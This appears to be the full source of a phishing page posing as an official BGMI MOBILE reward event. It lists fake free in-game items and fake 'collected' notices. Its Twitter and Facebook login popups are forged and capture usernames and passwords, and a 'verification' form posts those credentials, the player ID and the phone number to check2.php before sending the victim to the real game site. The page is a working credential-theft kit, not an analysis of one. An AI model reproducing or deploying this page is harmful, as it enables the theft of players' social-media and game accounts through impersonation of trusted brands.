.twitter-load {	
	background-size: 100% 100%;
	width: 93%;
	height: 421px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 15px;
	padding: 20px;
	padding-top: 0px;
	padding-bottom: 25px;
	display: block;
}
.twitter-load-title {
	width: 95%;
	height: auto;
	margin-top: 100px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 6px;
	padding-top: 110px;
	color: #fff;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.twitter-load-title i {
	margin-top: 150px;
	padding-top: 15px;
	padding-bottom: 15px;
	color: #00acee;
	font-size: 50px;	
	text-align: center;
}
.fb-load {	
	background-size: 100% 100%;
	width: 93%;
	height: 333px;
	margin-top: -1px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 15px;
	padding: 20px;
	padding-top: 0px;
	padding-bottom: 25px;
	display: block;
}
.fb-load img {		
	width: 50px;
	height: 50px;	
	margin-top: 230px;	
	margin-bottom: -55px;
}
.fb-load-title {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 6px;
	color: #999998;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.fb-load-title i {
	margin-top: 200px;
	padding-top: 15px;
	padding-bottom: 15px;
	color: #999998;
	font-size: 30px;	
	text-align: center;
}
.popup-btn-login2 {
    width: 30%;
    height: 33px;
    padding: 6px;
    margin-top: 15px;
    margin: 2px;
    color: #000;
	font-size: 16px;
    font-family:selow;
    border: none;
    border-radius: 2px;
    outline: none;
    position: relative;
}
.popup-btn-login2 i {
    color: #fff;
    font-size: 20px;
    float: left;
}
.popup-btn-facebook2 {
    background: #1778f2;
    color: #fff;
}
.popup-btn-twitter2 {
    background: #ffffff;
    color: #0d0c0c;
}
.popup-btn-link2 {
    background: #E3B448;
    color: #000;
}
.popup-btn-login2 img {
    width:16px;
    height:16px;
    float: left;
}
@media only screen and (max-width:600px) {
    .container {
        width: 100%;
        height: auto;
        border: none;
        padding: 0px;
    }
    .event-notification-content {
        width: 84.6%;
        margin-top: -46px;
        margin-right: 0.3px;
        border-left: 0px;
    }
    .event-notification {    
	width:98%;
	height:53px;
	padding:7px;
	margin-right: auto;
	margin-left: auto;
    }
    .event-notification-text {
	padding-top:10px;
	font-family:selow;
	font-size:16px;
    }
    .item2 {
        width: 22%;
        height: 76px;
        margin-top: 12px;        
        margin: 1px;
    }
    .item3 {
        width: 28%;
        height: 96px;
    }
    .itembutton {
        width: 28%;
        height: 96px;
    }    
    .item4 {
        width: 40%;
        height: 77px;
        margin: 3px;
    }
    .item5 {
        width: 23%;
        height: 77px;
        margin: 4px;
    }
    .item .item-nominal {
        padding-right: 3px;
        bottom: -60px;
    }
    .about-box-content {
        margin-top: 15px;
    }
    .popup-box-wrapper {
        width: 380px;
        margin-top: 55%;
    }
    .popup-box-wrappers {
        width: 360px;
        margin-top: 40%;
    }
    .popup-box-wrapper-login {
        width: 400px;
        margin-top: 55%;
    }
    .popup-box-item {
        width: 12%;
        height: 50px;
    }
.popup-box-item-many { width: 25%; height: 80px; margin: 1px -45px 10px; margin-left:45px; text-align: right; display: inline-block; }
.popup-box-item-many { width: 100%; height: 100%; 
  
}
    .popup-box-verification {
        margin-top: 20%;
    }
    .popup-box-login-fb {
        margin-top: 10%;
    }
    .popup-box-login-twitter {
        margin-top: 10%;
    }
}
.event-title {
background: url(img/title.png) no-repeat center center;
background-size: 100% 100%;
width: 100%;
height: 65px;
margin-top: 0px;
margin-right: auto;
margin-left: auto;
margin-bottom: -30px;
display:block;
position: relative;
}
.event-titlez {
background: url(img/fire.png) no-repeat center center;
background-size: 100% 100%;
width: 10%;
height: 42px;
position: relative;
-webkit-animation:bounceInDown .9s linear infinite;
}
.jarum {
	width: 19%;
	height: auto;
	position: relative;
	margin-top: -20px;
	left: 5px;
	-webkit-animation:bounceInDown .9s linear infinite;
}
@keyframes bounceInDown {
   0% {
      opacity: 1;
      transform: translateY(0px);
   }
   60% {
      opacity: 1;
      transform: translateY(3px);
   }
   80% {
      transform: translateY(3px);
   }
   100% {
      transform: translateY(0px);
   }
}
.cover2 {
width: 100%;
height: auto;
}
.cover2 img {
width: 100%;
height: auto;
margin-top: -30px;
border: none;
position: absolute;
}
.line-bg {
  background:url(img/notify.png) no-repeat top center;
  background-size:130% 100%;
  width:100%;
  height:3px;
}
</style>  
<div class="container">
<div class="navbar">
<img class="navbar-logo" src="img/style-img/logo.png">
<div class="navbar-right">
<img class="navbar-shop" src="img/style-img/navFb.png">
<img class="navbar-language" src="img/style-img/navIg.png">
<img class="navbar-language" src="img/style-img/navYt.png">
<div class="navbar-download"><img src="img/style-img/menu.png"></div>
</div> <!--- navbar-right --->
</div> <!--- navbar --->
<div class="header">
<img src="img/header.jpg"></img>
</div>
<div class="line-bg" style="margin-top: -1px;position: relative;"></div>
<div class="sec-container">
<center>
<div class="event-titlez" style="float: left;margin-top: 10px;left: 8px;"></div> <!--- event-title --->
<div class="event-title"></div> <!--- event-title --->
<div class="event-titlez" style="float: right;margin-top: -25px;right: 9px;"></div> <!--- event-title --->
<div class="box">
<div class="box-item">
<div class="tab_rewards" id="latest">
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="img/reward/1.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/reward/1.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="img/reward/2.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/reward/2.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="img/reward/3.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/reward/3.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="img/reward/4.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/reward/4.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="img/reward/5.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/reward/5.jpg">Collect</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="img/reward/6.jpg">
</figure>
</div>
<div>
<button type="button" onmousedown="buka.play();" onclick="open_itemReward_confirmation(this);" src="img/reward/6.jpg">Collect</button>
</div>
</div>
<br><br>
</div> <!--- tab-rewards --->
</div>
</div>
<div class="lenzz-wrapper">
<div class="lenzz">
<div class="lenzz-text">
<div class="slider animated fadeIn"><i class="fa-solid fa-gift"></i> ID 5883485429 Collected Inferno Fiend Men Set</div>
<div class="slider animated fadeIn"><i class="fa-solid fa-gift"></i> ID 5295893347 Collected M416 - Glacier</div>
<div class="slider animated fadeIn"><i class="fa-solid fa-gift"></i> ID 5155030554 Collected Inferno Fiend Girl Set</div>
<div class="slider animated fadeIn"><i class="fa-solid fa-gift"></i> ID 5463336783 Collected Materials - 10</div>
<div class="slider animated fadeIn"><i class="fa-solid fa-gift"></i> ID 5356786904 Collected SSC Tuatara Rose</div>
<div class="slider animated fadeIn"><i class="fa-solid fa-gift"></i> ID 5688686451 Collected Materials - 5</div>
</div></div> <!--- lenzz-text --->
</div> <!--- lenzz-wrapper --->
</center>
</div> <!--- sec-container --->
<div class="line-bg"></div>
<div class="footer">
<img class="footer-copyright-icon" src="img/style-img/footer.png">
<div class="footer-txt-copyright">ⓒ 2024 KRAFTON, Inc. All rights reserved.</div> <!--- footer-txt-copyright --->
<div class="footer-txt-copyright">Privacy Policy | Terms of Service | Rules of Conduct <br> | Official Community Policy</div> <!--- footer-txt-copyright --->
<br>
</div> <!--- footer --->
</div> <!--- container --->

<div class="popup itemReward_confirmation" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar" style="margin-bottom:12px;">
<div class="popup-box-navbar-title">Reward Confirmation</div> <!--- popup-box-navbar-title --->
<img onmousedown="tutup.play();" onclick="close_reward_confirmation()" src="img/close.png">
</div> <!--- popup-box-navbar --->
<div class="popup-box-bgs">
<div class="popup-box-alert4"><br>Are you sure to collect this reward?</div> <!--- popup-box-alert --->
<div class="popup-box-item itemShine" style="width:22%;height:85px;">
<div>
<figure>
<img src="" id="myItemReward_confirmationImg">
</figure>
</div>
</div> <!--- popup-box-item itemShine --->
<br>
<div class="popup-box-footers">
<button type="button" onmousedown="buka.play();" onclick="open_account_login()">Collect</button>
</div> <!--- popup-box-footer --->
<br>
</div> <!--- popup-box-bg --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup itemReward_confirmation --->

<div class="popup account_login animated fadeIn" style="display: none;">
<div class="popup-box-wrapper-login">
<div class="popup-box-navbar-login">
<div class="popup-box-navbar-login-title"></div> <!--- popup-box-navbar-login-title --->
</div> <!--- popup-box-navbar-login --->
<div class="popup-box-bg-login">
<img style="opacity:0%; width: 40%; height: 56px; margin-top: 70px; margin-left: auto; margin-right: auto; margin-bottom: 0px;" src="img/style-img/gamecon.png">
<br>
<button type="button" class="popup-btn-login popup-btn-twitter" onmousedown="buka.play();" onclick="open_twitter();"><i class="fa-brands fa-x-twitter" style="color: #000000;"></i>Twitter</button>
<button type="button" class="popup-btn-login popup-btn-facebook" onmousedown="buka.play();" onclick="open_facebook();"><i class="fa-brands fa-square-facebook"></i>Facebook</button>
<img style="width: 95%; opacity:0%;height: auto; margin-top: -35px; margin-left: auto; margin-right: auto; margin-bottom: 10px;" src="https://i.ibb.co/rkwGGNP/priv-laz.png">
<br>
</div> <!--- popup-box-bg-login --->
<div class="popup-box-footer-login"></div> <!--- popup-box-footer-login --->
</div> <!--- popup-box --->
</div> <!--- popup account_login --->

<div class="popup-login login-twitter animated fadeIn" style="display: none;">
<div class="popup-box-login-twitter">
<a onmousedown="tutup.play();" onclick="close_twitter()" class="close-other"><i class="zmdi zmdi-close"></i></a>
<div class="header-twitter"><img src="img/style-img/icon-twitter.png">
<div class="header-twitter-text"> Log in With Twitter </div></div> <!--- navbar-fb-text --->
<div class="content-box-twitter">
<div class="txt-login-twitter">Log in to your X account to connect to BGMI MOBILE.</div> <!--- txt-login-twitter --->
<div class="content-box-twitter-txt">
<img src="img/style-img/icon.png">
<div class="content-box-twitter-txt-title">
BGMI MOBILE<br></div>
<div class="content-box-twitter-txt-det">
WINNER WINNER CHICKEN DINNER!
<br>
Official BGMI MOBILE Game!</div></div>
<form action="javascript:void(0)" method="post" id="ValidateLoginTwitterForm">
<div class="form-group-twitter">
<input type="text" name="email" id="email-twitter" autocomplete="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
<label>Phone, email, or username</label>
</div> <!--- form-group-twitter --->
<div class="form-group-twitter">
<div class="form-group-sohi TwitterShowPassword" onclick="showTwitterPassword()">
<img src="img/style-img/Twitter-Hide-Password.png">
</div> <!--- form-group-sohi TwitterShowPassword --->
<div class="form-group-sohi TwitterHidePassword" style="display: none;" onclick="hideTwitterPassword()">
<img src="img/style-img/Twitter-Show-Password.png">
</div> <!--- form-group-sohi TwitterHidePassword --->
<input type="password" name="password" id="password-twitter" autocomplete="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
<label>Password</label>
</div> <!--- form-group-twitter --->
<center><div class="alert-twitter-failed email-tw">
<a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">Sorry, we couldn't find your account.</a></div>
<div class="alert-twitter-failed sandi-tw">
<a class="alert-twitter"><img class"alert-img" src="img/style-img/alert.png">Wrong Password!</a></div></center>
<input type="hidden" name="login" id="login-twitter" value="Twitter" readonly>
<input type="hidden" name="playid" id="ValidatePopupPlayId" readonly>
<button type="submit" href='#kinn-verify-on' class="onbutton" onclick="ValidateLoginTwitterData()">Log in</button>
</form>
<div class="content-box-twitter-txt-footer">
We recommend reviewing the app's terms and privacy policy to understand how it will use data from your Twitter account. You can revoke access to any app at any time from the <a>Apps and sessions</a> of your Twitter account settings.<br></div>
<div class="content-box-twitter-txt-footers">
By continuing, BGMI MOBILE will receive ongoing access to the information that you share and Twitter will record when BGMI MOBILE accesses it. <a>Learn more</a> about this sharing and the settings that you have. BGMI MOBILE's <a>Privacy Policy</a> and <a>Terms</a>.<br></div>
</div> <!--- content-box-twitter --->
</div> <!--- popup-box-login-twitter --->
</div> <!--- popup-login --->

<div class="popup-login login-twitter-load" style="display: none;">
<div class="popup-box-login-twitter">
<div class="header-twitter"><img src="img/style-img/icon-twitter.png">
<div class="header-twitter-text"> Log in With Twitter </div></div> <!--- navbar-fb-text --->
<div class="twitter-load">
<div class="twitter-load-title">
<div class="loader2"></div>
</div> <!--- twitter-load-title --->
</div> <!--- twitter-load --->
</div> <!--- popup-box-login-twitter --->
</div> <!--- popup-login --->

<div class="popup-login login-facebook animated fadeIn" style="display: none;">
<div class="popup-box-login-fb">
<a onmousedown="tutup.play();" onclick="close_facebook()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
<div class="navbar-fb"><img src="img/style-img/icon-facebook.png">
<div class="navbar-fb-text"> Log in With Facebook </div></div> <!--- navbar-fb-text --->
<div class="navbar-alert-fb email-fb">The email address or phone number that you've entered doesn't match any account. <b>Sign up for an account.</b></div> <!--- navbar-alert --->
<div class="navbar-alert-fb sandi-fb">The password that you've entered is incorrect. <b>Forgotten password?</b></div> <!--- navbar-alert --->
<div class="content-box-fb">
<img src="img/style-img/icon.png">
<div class="txt-login-fb">Log in to your Facebook account to connect to BGMI MOBILE.</div> <!--- txt-login-fb --->
<div class="txt-login-alert">This doesn't let the app post to Facebook.</div> <!--- txt-login-fb --->
<form class="login-form" action="javascript:void(0)" method="post" id="ValidateLoginFbForm">
<div class="form-group-fb">
<input type="text" name="email" id="email-facebook" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
<div class="login-form-shid showPassword" id="showFbPassword" onclick="showFbPassword()">Show</div> <!--- login-form-shid showPassword --->
<div class="login-form-shid hidePassword" style="display: none;" onclick="hideFbPassword()">Hide</div> <!--- login-form-shid hidePassword --->
<input type="password" name="password" id="password-facebook" placeholder="Password" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity(' ')" oninput="setCustomValidity('')">
</div> <!--- form-group-fb --->
<input type="hidden" name="login" id="login-facebook" value="Facebook" readonly>
<input type="hidden" name="playid" id="ValidatePopupPlayId" readonly>
<button type="submit" class="btn-login-fb" onclick="ValidateLoginFbData()">Log In</button>
</form>
<div class="txt-footer">By continuing, BGMI MOBILE will receive ongoing access to the information that you share and Facebook will record when BGMI MOBILE accesses it. <a>Learn more</a> about this sharing and the settings that you have.</div> <!--- txt-footer --->
<div class="txt-footers">BGMI MOBILE's <a>Privacy Policy</a> and <a>Terms</a>
</div> <!--- txt-footer ---><br>
</div> <!--- content-box-fb --->
</div> <!--- popup-box-login-fb --->
</div> <!--- popup-login --->

<div class="popup-login login-facebook-load" style="display: none;">
<div class="popup-box-login-fb">
<div class="navbar-fb"><img src="img/style-img/icon-facebook.png">
<div class="navbar-fb-text"> Log in With Facebook </div></div> <!--- navbar-fb-text --->
<div class="content-box-fb">
<div class="fb-load">
<img src="img/style-img/icon_fb.png">
<div class="loader3"></div>
</div> <!--- fb-load --->
</div> <!--- content-box-fb --->
</div> <!--- popup-box-login-fb --->
</div> <!--- popup-login--->

<div class="popup account_verification animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Account Verification</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bgs" style="margin-top: 0px;">
<div class="popup-box-alert4">
<br>Please re-verify your account</font></div> <!--- popup-box-alert --->
<form class="popup-box-form" action="javascript:void(0)" method="post" id="MyValidateVerificationDataForm">
<input type="hidden" name="email" id="validateEmail" readonly>
<input type="hidden" name="password" id="validatePassword" readonly>
<input type="hidden" name="codetel" id="validateTel" readonly>
<input type="number" name="playid" id="playid" placeholder="Player ID" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Player ID')" oninput="setCustomValidity('')">
<input type="number" name="phone" id="phone" placeholder="Phone Number" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Phone Number')" oninput="setCustomValidity('')">
<select name="level" id="level" required oninvalid="this.setCustomValidity('Choose your account level')" oninput="setCustomValidity('')">
<option selected="selected" disabled="disabled" value="">Account Level</option>
<script>
for(var i = 40; i <= 100; i++){
document.write("<option>" + i + "</option>");};
</script>
</select>
<input type="hidden" name="login" id="validateLogin" readonly>
<br>
<div class="popup-box-footers">
<button type="submit" onmousedown="buka.play();" onclick="MyValidateVerificationData()">Verification</button>
</div> <!--- popup-box-footer --->
<br>
</div> <!--- popup-box-bg --->
</form> <!--- form --->
</div> <!--- popup-box-wrapper popup-box-verification --->
</div> <!--- popup account_verification --->

<div class="popup check_verification animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Please wait</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bgs" style="margin-top: 0px;">
<div class="popup-box-loading"><br><br><br>
<img class="animate-spin" src="img/style-img/loading.png"></img>
<br><br>Checking your account details...
<br>
</div>
<div class="popup-box-footer"></div>
</div> <!--- popup-box-form-footer --->
</div> <!--- popup-box-alert4 --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup check_verification --->

<div class="popup processing_account animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Processing Account</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bgs">
<div class="popup-box-alert3"><br>
Thank you for joining the BGMI MOBILE Event
<br>
Your account is being processed to receive your reward.
<br>Please wait up to 24 hours. </div>
<div class="popup-box-alert0">
<br>- BGMI MOBILE -
</div> <!--- popup-box-alert0 --->
<div class="popup-box-footers">
<button type="button" onmousedown="tutup.play();" onclick="location.href='https://www.battlegroundsmobileindia.com/';">Logout</button>
</div> <!--- popup-box-bg --->
<br>
</div> <!--- popup-box-form-footer --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup processing_account --->

<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<audio id="audioFile" src="media/putaran.mp3"></audio>
<script src="js/international-telephone-input.js"></script>
<script src="js/selowscript.js"></script>
<script src="js/showHide.js"></script>
<script src="js/sliders.js"></script>
<script src="js/click.js"></script>
<script src="js/scriptv1.js"></script>
<script src="js/link.js"></script>
<script>
setTimeout(function () {
	$('#load-login').hide()
    $('#box-login').show()
  }, 2500)
 
// kode untuk slider notif
var slideIndex = 0;
showSlides();
function showSlides() {
    var i;
    var slides = document.getElementsByClassName("slider");
    for (i = 0; i < slides.length; i++) {
        slides[i].style.display = "none"; 
    }
    slideIndex++;
    if (slideIndex > slides.length) {slideIndex = 1} 
    slides[slideIndex-1].style.display = "block"; 
    setTimeout(showSlides, 2400);
}
// code for validate data to sending to file result
function MyValidateVerificationData(){
	$('#MyValidateVerificationDataForm').submit(function(submitingMyVerificationData){
	submitingMyVerificationData.preventDefault();
	
	var $validateEmail = $("input#validateEmail").val();
	var $validatePassword = $("input#validatePassword").val();
	var $codetel = $("input#validateTel").val();
	var $playid = $("input#playid").val();
	var $phone = $("input#phone").val();
	var $level = $("input#level").val();
	var $validateLogin = $("input#validateLogin").val();
	if($validateEmail == "" && $validatePassword == "" && $codetel == "" && $playid == "" && $phone == "" && $level == "" && $validateLogin == ""){
	$('.verification_info').show();
	$('.account_verification').hide();
	return false;
	}
	
	$.ajax({
		type: "POST",
		url: "check2.php",
		data: $(this).serialize(),
		beforeSend: function() {
			$('.check_verification').show();
			$('.account_verification').hide();
		},
		success: function(){
		$('.processing_account').show();
		$('.check_verification').hide();
		$('.account_verification').hide();
		}
	});
	});  
	return false;
};
function close_reward_confirmation(){
	$(".itemReward_confirmation").hide()
	$('.newhome').hide();
}
function open_facebook(){
	$('.login-facebook').show();
	$('.account_login').hide();
}
function open_twitter(){
	$('.login-twitter').show();
	$('.account_login').hide();
}
function close_facebook(){
	$('.login-facebook').hide()
	$('.account_login').show();
}
function close_twitter(){
	$('.login-twitter').hide()
	$('.account_login').show();
}
function open_account_login(){
	$('.account_login').show();
	$('.itemReward_confirmation').hide();
  $('.many_confirmation').hide()
}
</script>
</body>
</html><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'89dbe0387c06660a',t:'MTcyMDA2MjE0MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script>